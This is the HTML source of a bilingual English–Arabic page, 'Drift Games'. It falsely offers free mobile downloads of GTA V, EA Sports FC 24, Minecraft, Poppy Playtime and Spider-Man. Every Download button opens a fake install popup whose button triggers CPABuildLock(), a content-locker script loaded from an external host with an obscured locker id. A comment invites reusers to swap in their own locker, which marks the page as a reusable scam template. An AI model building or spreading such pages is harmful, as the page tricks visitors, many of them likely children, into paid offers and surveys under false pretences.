<html>

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="pushsdk" content="0b3aea1c0f84c935acb87c8cc9a720bb">
    <link rel="shortcut icon" href="favicon_1.ico" type="image/x-icon">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <link href="css/bootstrap-glyphicons.css" rel="stylesheet">

    <title>Drift Games</title>
    <!-- Styles -->
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600" rel="stylesheet" type="text/css">
    <link href="css/app_1.css" rel="stylesheet">
    <link href="css/app.css" rel="stylesheet">
    <link href="css/framework7.css" rel="stylesheet">



    <script src="js/jquery.min.js"></script>



</head>

<body>
    <main class="page-content framework7-root">
        <div class="page-inner white-bg">
            <div id="main-wrapper">
                <div class="row">
                    <div class="col-md-6 col-xs-12 col-sm-12 center">
                        <div class="main-page-title">
                            <img src="https://i.postimg.cc/xTJhr0mf/Logo.png"
                                class="app-navbar-head-logo center breathing">
                        </div>
                        <br>
                        <div class="app-box appscloud-block">

                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon"
                                        src="images/Golf6.png">
                                    <div class="app-info">
                                        <div class="app-name">Car Driving Drift</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#"
                                        onclick="install('images/grand-theft-auto-v-cover.jpg', 'GTA V Mobile 2022 ','da34067')"
                                        class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Download تحميل</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon"
                                        src="images/grand-theft-auto-v-cover.jpg">
                                    <div class="app-info">
                                        <div class="app-name">GTA V Mobile </div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#"
                                        onclick="install('images/grand-theft-auto-v-cover.jpg', 'GTA V Mobile 2022 ','da34067')"
                                        class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Download تحميل</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon"
                                        src="images/Fifa24.png">
                                    <div class="app-info">
                                        <div class="app-name">EA Sports FC 24</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#"
                                        onclick="install('images/la-jaquette-de-FIFA-232be32be3.jpg', 'FIFA23','6948742')"
                                        class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Download تحميل</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>

                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="images/Jxx4wkaQ.jpg">
                                    <div class="app-info">
                                        <div class="app-name">Poppy Playtime 2</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('images/Jxx4wkaQ.jpg', 'Poppy Playtime 2','6948742')"
                                        class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Download تحميل</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>

                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="images/5M1ZsvA.png">
                                    <div class="app-info">
                                        <div class="app-name">SpiderMan Mobile</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('images/5M1ZsvA.png', 'Spider-Man','6948742')"
                                        class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Download تحميل</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon"
                                        src="https://play-lh.googleusercontent.com/VSwHQjcAttxsLE47RuS4PqpC4LT7lCoSjE7Hx5AW_yCxtDvcnsHHvm5CTuL5BPN-uRTP">
                                    <div class="app-info">
                                        <div class="app-name">Minecraft</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#"
                                        onclick="install('https://play-lh.googleusercontent.com/VSwHQjcAttxsLE47RuS4PqpC4LT7lCoSjE7Hx5AW_yCxtDvcnsHHvm5CTuL5BPN-uRTP', 'Minecraft','6948742')"
                                        class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>Download تحميل</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>


                            </div><!-- Row -->
                        </div><!-- Main Wrapper -->
                    </div><!-- Page Inner -->
                </div>
            </div>
        </div>
    </main><!-- Page Content -->

    <div class="popup modal-in" id="install" style="background: #fff; display: none;">
        <div class="fake-homescreen" style>
            <a id="close" class="close-button"></a>
            <div class="iphone-display" aria-hidden="true">
                <div class="app-icon-area">
                    <div class="app-icon-region">
                        <img id="app_icon" alt="app icon" src="#" class="app-modal-icon"
                            style="width: 33px; height: 33px;">
                    </div>
                    <div class="fake-homescreen-app-name" style="font-size:7.5px!important">
                        <span id="app_name" class="installingAppName">Pokemon Go Spoofing</span>
                    </div>
                </div>
            </div>
        </div>
        <div class="block" style="color:#000000">
            <center>
                <div>
                    <div class="app-caption">
                        <h2 id="app-caption-title">title</h2>
                        <p>Follow the steps after install إتبع الخطوات بعد التثبيت </p>
                    </div>
                    <hr>
                    <div class="details">
                        <a class="btn btn-info btn-block install-btn" onclick="CPABuildLock()" id="install-btn">install
                            تثبيت</a>
                        <p>Free مجاناً</p>
                    </div>
                </div>
            </center>
        </div>
    </div>
    <div role="dialog">

        <div class="md" id="myPopup1" style="display: none">
            <div class="dialog-backdrop backdrop-in"></div>
            <div class="dialog dialog-no-buttons dialog-progress modal-in" id="myPopup"
                style="display: none; margin-top: -100px;">

                <div class="dialog-inner">
                    <div class="dialog-title">انتظر جاري التحميل downloading...</div>
                    <div id="dt" class="dialog-text">Sit tight</div>
                    <div class="progressbar">
                        <span id="bar1"
                            style="width: 0%; display: inline-block; height: 100%; transform: scale(-1, 1);"></span>
                    </div>
                </div>

            </div>
        </div>
    </div>
    <script>

        function id(id) {
            return document.getElementById(id);
        }

        function install(icon, name, locker_id) {
            id("app_icon").src = icon;
            id("app_name").innerHTML = name;
            id("app-caption-title").innerHTML = name;

            window.lcr = "" + locker_id;
            id("install").style.display = "block";
        }

        id('close').onclick = function () {
            id("install").style.display = "none";
        }
    </script>



<!-- BDL HAD LOCKER B LOCKER TA3K-->

    <script type="text/javascript">
    var xhqvf_sSC_Lnbwxc={"it":4415402,"key":"2afa7"};
</script>
<script src="https://d2zk8mk8hghu3d.cloudfront.net/ee8591c.js"></script>


<!-- </body> -->
<!--EDITED BY L3ZWA-->
</html>
